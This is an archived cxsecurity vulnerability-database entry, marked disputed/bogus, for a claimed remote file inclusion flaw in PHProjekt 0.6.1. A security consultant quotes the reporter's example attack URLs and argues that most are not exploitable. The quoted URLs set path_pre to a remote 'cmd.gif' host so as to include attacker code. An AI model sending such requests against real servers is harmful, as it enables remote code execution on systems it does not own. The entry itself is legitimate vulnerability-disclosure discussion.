Bogus: PHProjekt v0.6.1 Remote File Inclusion Vulnerability (2) ( Ascii Version )

Search:
WLB2

Disputed / BOGUS
PHProjekt v0.6.1 Remote File Inclusion Vulnerability (2)

Published
Credit
Risk
2006.09.08
D3nGeR
High
CWE
CVE
Local
Remote
N/A
CVE-2006-4609
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
5.1/10
6.4/10
4.9/10
Exploit range
Attack complexity
Authentication
Remote
High
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

Hi,

D3nGeR (at) Gmail (dot) CoM [email concealed] schrieb am Mon, 21 Aug 2006 19:26:55 +0000:

># http://[Target]/[Path]/cm_lib.inc.php?path_pre=http://cmd.gif?

This script uses path_pre only as a part of for example
$cm_cfgpath. It may be possible to use it, but it may be
a little bit complicate.

># http://[Target]/[Path]/doc/br.edithelp.php?path_pre=http://cmd.gif?
>
># http://[Target]/[Path]/doc/de.edithelp.php?path_pre=http://cmd.gif?
>
># http://[Target]/[Path]/doc/ct.edithelp.php?path_pre=http://cmd.gif?
>
># http://[Target]/[Path]/userrating.php?path_pre=http://cmd.gif?
>
># http://[Target]/[Path]/listing.php?path_pre=http://cmd.gif?

All of this script intialize $path_pre and I see
no way to manipulate them between initialization
and usage.

Regards
Carsten

--
Dipl.-Inform. Carsten Eilers
IT-Sicherheit und Datenschutz

<http://www.ceilers-it.de>

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version